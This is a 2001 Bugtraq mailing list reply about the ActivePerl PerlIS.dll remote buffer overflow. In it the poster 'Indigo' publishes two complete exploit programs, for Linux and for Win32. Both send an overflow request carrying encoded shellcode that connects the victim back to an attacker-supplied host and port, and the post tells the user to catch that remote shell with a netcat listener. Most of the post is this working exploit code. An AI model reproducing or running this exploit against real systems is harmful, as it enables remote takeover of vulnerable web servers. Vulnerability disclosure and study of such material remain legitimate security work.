Bugtraq mailing list archives
Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability
From: Indigo <indig0 () talk21 com>
Date: 21 Nov 2001 01:38:45 -0000
Mailer: SecurityFocus In-Reply-To: <20011116015506.17854.qmail () mail securityfocus com>
Received: (qmail 4025 invoked from network); 16
Nov 2001 04:11:34 -0000
Received: from outgoing2.securityfocus.com
(HELO outgoing.securityfocus.com) (66.38.151.26)
by mail.securityfocus.com with SMTP; 16 Nov
2001 04:11:34 -0000
Received: from lists.securityfocus.com
(lists.securityfocus.com [66.38.151.19])
by outgoing.securityfocus.com (Postfix)
with QMQP
id 78A568F460; Thu, 15 Nov 2001
20:31:32 -0700 (MST)
Mailing-List: contact bugtraq-
help () securityfocus com; run by ezmlm
Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq () securityfocus com> List-Help: <mailto:bugtraq-
help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-
unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-
subscribe () securityfocus com>
Delivered-To: mailing list
bugtraq () securityfocus com
Delivered-To: moderator for
bugtraq () securityfocus com
Received: (qmail 26744 invoked from network); 16
Nov 2001 02:03:39 -0000
Date: 16 Nov 2001 01:55:06 -0000 Message-ID:
<20011116015506.17854.qmail@mail.securityfocus.c om>
Content-Type: text/plain Content-Disposition: inline Content-Transfer-Encoding: binary MIME-Version: 1.0 X-Mailer: MIME-tools 5.411 (Entity 5.404) From: Jim <raxor () dexlink com> To: bugtraq () securityfocus com Subject: Re: NSFOCUS SA2001-07 : ActivePerl
PerlIS.dll Remote Buffer
Overflow Vulnerability Mailer: SecurityFocus In-Reply-To:
<20011115113830.45A9.SECURITY () nsfocus com>
Has anyone been able to duplicate this bug ? Am I wrong or does the ISAPI version of ActivePerl execute .plx files and not .pl as mentioned in the advisory ?
Not only could I duplicate it, I exploited it. The exploit uses .pl as the extension. Cheers, Indigo. Jack for Linux: /* jack.c - Active Perl ISAPI overflow exploit by Indigo <indig0 () talk21 com> 2001 Usage: jack <victim host> <victim port> <attacker host> <attacker port> Before executing jack start up a netcat listener with the port set to 'attacker port' eg: nc -l -p 'attacker port' You may need to hit return a few times to get the prompt up main shellcode adapted from jill.c by dark spyrit <dspyrit () beavuh org> Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ #include <sys/types.h> #include <sys/time.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <errno.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <fcntl.h> #include <netdb.h> int main(int argc, char *argv[]) { unsigned char shellcode[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69 \x6e\x2f" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15 \x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95 \x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96 \xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14 \x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66 \x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6 \x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1 \x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96 \x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97 \x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95 \x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41 \xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95 \x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1 \xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5 \x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95 \x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5 \x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95 \x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95 \x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2 \x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2 \x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10 \x3e\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11 \x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2 \x91\x55\x3d\x97\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2 \x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1 \xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95 \x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05 \x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05 \x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9 \x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41 \xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39 \x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0 \xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9 \xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0 \x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6 \xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0 \xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9 \xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1 \xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7 \xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2 \xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5 \x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1 \x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3 \x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33 \xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a" "\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30 \x0D\x0A\x0D\x0A\x00"; int s; unsigned short int a_port; unsigned long a_host; struct hostent *ht; struct sockaddr_in sin; printf ("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n"); if (argc != 5) { printf ("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv [0]); exit (1); } if ((ht = gethostbyname(argv[1])) == 0){ herror(argv[1]); exit(1); } sin.sin_port = htons(atoi(argv[2])); a_port = htons(atoi(argv[4])); a_port^=0x9595; sin.sin_family = AF_INET; sin.sin_addr = *((struct in_addr *)ht->h_addr); if ((ht = gethostbyname(argv[3])) == 0){ herror(argv[3]); exit(1); } a_host = *((unsigned long *)ht->h_addr); a_host^=0x95959595; shellcode[745]= (a_port) & 0xff; shellcode[746]= (a_port >> 8) & 0xff; shellcode[750]= (a_host) & 0xff; shellcode[751]= (a_host >> 8) & 0xff; shellcode[752]= (a_host >> 16) & 0xff; shellcode[753]= (a_host >> 24) & 0xff; if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){ perror("socket"); exit(1); } printf("\nSending exploit....\n"); if ((connect(s, (struct sockaddr *) &sin, sizeof (sin))) == -1){ perror("connect"); exit(1); } write(s, shellcode, strlen(shellcode)); sleep (1); close (s); printf ("Exploit sent.\n\n"); exit(0); } <CUT> Jack for Win32: /* jack.c - Active Perl ISAPI overflow exploit by Indigo <indig0 () talk21 com> 2001 Usage: jack <victim host> <victim port> <attacker host> <attacker port> Before executing jack start up a netcat listener with the port set to 'attacker port' eg: nc -l -p 'attacker port' You may need to hit return a few times to get the prompt up main shellcode adapted from jill.c by dark spyrit <dspyrit () beavuh org> Greets to: Morphsta, Br00t, Macavity, Jacob & Monkfish...Not forgetting D-Niderlunds */ #include <windows.h> #include <stdio.h> #include <winsock.h> void main(int argc, char **argv) { SOCKET s = 0; WSADATA wsaData; int x; unsigned short int a_port; unsigned long a_host; unsigned char shellcode[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69 \x6e\x2f" //GET /cgi-bin/ "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" //offset to return address "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42 \x42\x42" "\x42\x42\x42\x8b\x94\xf8\x77\x42\x42\x42\x42" "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15 \x90\x90\x90" "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95 \x40\xe2\xfa\x2d\x95\x95" "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96 \xdd\x7e\x60\x7d\x95\x95\x95\x95" "\xc8\x1e\x40\x14 \x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66 \x1e\xe3" "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6 \x78\xc3\xc2\xc4\x1e\xaa" "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1 \x9d\xcc\xca\x16\x52\x91" "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96 \x56\x44\x74\x96\x54\xa6" "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97 \x96\x54\x1e\x95\x96\x56" "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95 \x7d\xe1\x94\x95\x95\xa6\x55" "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41 \xcf\x1e\x4d\x2c\x93\x95\x95\x95" "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95 \x52\xd2\xfd\x95\x95\x95" "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1 \xc5\x18\xd2\x85\xc5" "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5 \x18\xd2\x8d\xc5\x18" "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95 \x95\x18\xd2\xb5\xc5\x6a" "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5 \x1e\xd2\x89\x1c\xd2\xcd\x14" "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95 \x18\xd2\xe5\xc5\x18\xd2" "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95 \x95\x95\x95\xc8\x14" "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2 \x85\x6a\xc2\x71\x6a\xe2" "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2 \x45\x1e\x7d\xc5\xfd" "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10 \x3e\x95\x95\x95\xa6\x55\xc5" "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11 \x02\x95\x95\x95\x1e\x4d" "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2 \x91\x55\x3d\x97\x94" "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2 \x49\xa6\x5c\xc4\xc3" "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1 \xf5\x05\x05\x05\x05\x15" "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95 \x91\x95\x95\xc0\x6a" "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05 \x05\xff\x95\x6a\xa3\xc0" "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05 \x05\x7e\x27\xff\x95\xfd" "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9 \x8d\x05\x05\x05\x05\xe1" "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41 \xff\xa7\x6a\xc2\x49\x7e" "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39 \x10\x55\xe0\x6c\xc4" "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0 \xe1\xc5\xe7\xfa\xf6" "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9 \xfc\xf7\xe7\xf4\xe7" "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0 \x95\xd2\xf0\xe1\xc6" "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6 \xe7\xf0\xf4\xe1\xf0" "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0 \xfe\xdb\xf4\xf8\xf0\xf1" "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9 \xfa\xf6\x95\xc2" "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1 \xd3\xfc\xf9\xf0\x95" "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7 \xfa\xf6\xf0\xe6\xe6\x95" "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2 \xc6\xda\xd6\xde\xa6" "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5 \x95\xe6\xfa\xf6\xfe\xf0" "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1 \x95\xf6\xfa\xfb\xfb" "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3 \x95\xf6\xf8\xf1\xbb" "\xf0\xed\xf0\x95\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x33" "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33 \xdb\xb3\x24\x03\xc3\xff\xe0" "\xeb\xb9\x90\x90\x05\x31\x8c\x6a" "\x2E\x70\x6C\x20\x48\x54\x54\x50\x2F\x31\x2E\x30 \x0D\x0A\x0D\x0A\x00"; //.pl HTTP/1.0 \n\n printf ("\njack - Active Perl ISAPI overflow launcher\nby Indigo <indig0 () talk21 com> 2001\n\n"); if (argc < 2) { printf ("Usage: %s <victim host> <victim port> <attacker host> <attacker port>\n", argv [0]); exit (0); } a_port = htons(atoi(argv[4])); a_port^=0x9595; a_host = inet_addr(argv[3]); a_host^=0x95959595; shellcode[745]= (a_port) & 0xff; shellcode[746]= (a_port >> 8) & 0xff; shellcode[750]= (a_host) & 0xff; shellcode[751]= (a_host >> 8) & 0xff; shellcode[752]= (a_host >> 16) & 0xff; shellcode[753]= (a_host >> 24) & 0xff; WSAStartup (MAKEWORD(2,0), &wsaData); s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (INVALID_SOCKET != s) { SOCKADDR_IN anAddr; anAddr.sin_family = AF_INET; anAddr.sin_port = htons (atoi(argv [2])); anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]); if (connect(s, (struct sockaddr *) &anAddr, sizeof (struct sockaddr)) == 0) { printf ("Sending exploit...."); if ((x = send (s, shellcode, strlen(shellcode), 0)) == 0) { printf ("send: error sending first packet\n\n"); exit (0); } printf ("Exploit sent.\n\n"); } closesocket(s); } }
Current thread:
- Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability Jim (Nov 15)
- <Possible follow-ups>
- Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability Indigo (Nov 21)
- Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability securityfocus.com.drew (Nov 23)
- Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability Indigo (Nov 27)